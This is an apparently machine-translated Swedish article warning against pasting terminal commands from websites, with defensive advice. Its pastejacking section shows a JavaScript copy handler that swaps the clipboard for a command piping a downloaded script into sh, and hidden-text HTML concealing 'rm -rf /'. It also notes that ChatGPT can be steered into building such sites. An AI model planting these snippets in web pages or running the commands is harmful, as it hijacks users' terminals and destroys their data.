Contents

Varför du inte bör kopiera och klistra in kommandon från Internet

Överallt, från datorer till mobiltelefoner, förekommer copy-pasting. Det gör livet enklare och sparar tid eftersom du inte behöver skriva långa kommandon eller överflödiga texter. Men om du inte är tillräckligt försiktig kan du bli hackad genom att helt enkelt kopiera in kommandon på datorns terminal.

Ska vi utforska de potentiella sårbarheter som är förknippade med att duplicera och infoga text, samt diskutera de försiktighetsåtgärder som kan användas för att skydda sig mot sådana risker?

Varför du inte bör kopiera och klistra in kommandon

Oavsett om man är en oerfaren användare av kommandoradsgränssnittet eller en skicklig utövare, är det inte ovanligt att individer kopierar och klistrar in kommandon från onlinekällor som ett sätt att påskynda sitt arbetsflöde och öka produktiviteten. Även om detta tillvägagångssätt kan verka effektivt vid första anblicken, är det viktigt att inse att vissa illvilliga webbplatser har börjat utnyttja denna praxis genom att bädda in skadlig kod i kopierade textrutor och därigenom i smyg införa skadlig kod i intet ont anande användares system när de oskyldigt klistrar in kommandon i sina terminaler.

För att dölja illvilliga direktiv har dessa illvilliga individer använt en rad bedrägliga tekniker i sin front-end-implementering, där till synes oskyldig kod används som en fasad för dolda och skadliga åtgärder.

Att utföra kommandot “sudo apt-get update && apt-get upgrade” används vanligtvis för att uppdatera arkivet och uppgradera paket på ett Linux-system. Det är dock viktigt att vara försiktig när du använder “sudo” -prefixet eftersom det ger administrativa privilegier, vilket potentiellt kan möjliggöra körning av skadlig kod utan användarens medvetenhet. Därför är det viktigt att kontrollera att alla kommandon är äkta innan de skrivs in i terminalen.

I en allvarlig situation är det tänkbart att ett helt system störtas eller att ransomware används som angreppsmetod. Men exakt vilken taktik använder sig dessa illvilliga enheter av för att utföra sådana handlingar? På vilket sätt kan skadliga direktiv kamoufleras i till synes oskyldig kod?

Hur skadlig kod utnyttjas

/sv/images/poc-of-exploit.jpg

Denna attack kan utföras med hjälp av antingen intrikat utformad JavaScript-kod eller till och med grundläggande HTML-syntax.JavaScript-språket är utrustat med ett instrument som kallas “EventListener”, som gör det möjligt att upptäcka och hantera olika händelser som kan inträffa i en webbläsare, inklusive men inte begränsat till att klicka på en knapp, skicka in ett formulär, flytta markören, skriva tangenter eller justera storleken på visningsfönstret.

EventListener är ett viktigt verktyg för att webbapplikationer ska kunna reagera på ett lämpligt sätt på specifika händelser som initieras av användaren. Tyvärr har det hänt att skrupelfria webbplatser har utnyttjat denna funktion genom att fånga upp situationer där användare kopierar text och sedan ersätter den med skadlig kod.

Den primära kod som användes vid skapandet av demonstrationsbilden är följande:

 <script>
document.addEventListener('copy', function(event) {
  event.preventDefault();
  const copiedText = "wget http://localhost:8000/malware.sh | sh";
  event.clipboardData.setData('text/plain', copiedText);
});
</script>

Här är en demonstration som använder vanlig HTML utan att kräva något skriptspråk som JavaScript:

 <p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>

</p> 

Användningen av ett omärkligt vitt teckensnitt döljer det skadliga kommandot “rm -rf /”, medan användningen av ett HTML-radbrytningselement ( ) gör att vissa terminaler automatiskt kör innehållet när det klistras in. I motsats till vad många tror behöver man inte ha avancerade kunskaper i programmering eller webbutveckling för att framgångsrikt genomföra en sådan cyberattack; det är snarare anmärkningsvärt enkelt att åstadkomma.

Trots bristande kunskaper om JavaScript eller webbutveckling kan även nybörjare använda ChatGPT för att utveckla skadlig kod. Genom att tillhandahålla strategisk input kan skrupelfria individer utnyttja sårbarheter i systemet, effektivt kompromettera dess säkerhetsåtgärder och styra det till att generera skadliga webbplatser som utnyttjar dessa svagheter.

Hur du kan skydda dig

/sv/images/blue-purple-coding.jpg

Det finns ingen idiotsäker metod för att skydda sig mot attacker med skadlig kod, men man kan vidta vissa försiktighetsåtgärder som att förbjuda JavaScript på webbplatser som anses vara potentiellt skadliga. Det är dock värt att notera att många moderna webbapplikationer kräver JavaScript för att fungera korrekt och att helt inaktivera det kan därför hindra surfningen.

Dessutom innebär metoden med Cascading Style Sheets en utmaning när det gäller att skydda sig mot illvilliga skript eftersom legitim CSS-kod används, även om avsikten fortfarande är skadlig. För att skydda sig effektivt är det av största vikt att följa grundläggande hygienrutiner på nätet och att vara vaksam.

När du använder kommandoraden är det lämpligt att vara försiktig när du navigerar på okända eller misstänkta länkar.För att minska potentiella säkerhetsrisker rekommenderas att användare verifierar äktheten hos kommandon från externa källor genom att granska dem i ett textredigeringsprogram innan de körs i terminalmiljön. Genom att hålla sig till pålitliga och väletablerade kodarkiv kan individer minimera sannolikheten för att införa skadlig kod i sitt system genom intet ont anande metoder.

Vissa terminalemulatorer som xfce4-terminal är dessutom utrustade med inbyggda säkerhetsåtgärder för att förhindra obehörig kopiering och inklistring av kommandon. Denna funktion visar ett meddelande som beskriver de specifika åtgärder som kommer att utföras när ett kommando klistras in i terminalen. För att säkerställa att din terminal också har denna funktion, kontrollera att den är tillgänglig och aktivera den därefter.

Exekvering av skadlig kod är mycket farligt

Även med ett antivirusprogram på plats kan vissa typer av skadlig programvara fortfarande lyckas bryta igenom en enhets säkerhetsförsvar. Därför är det viktigt att vara försiktig när man laddar ner eller kopierar kod från Internet och vidta nödvändiga försiktighetsåtgärder för att skydda sig mot potentiella hot.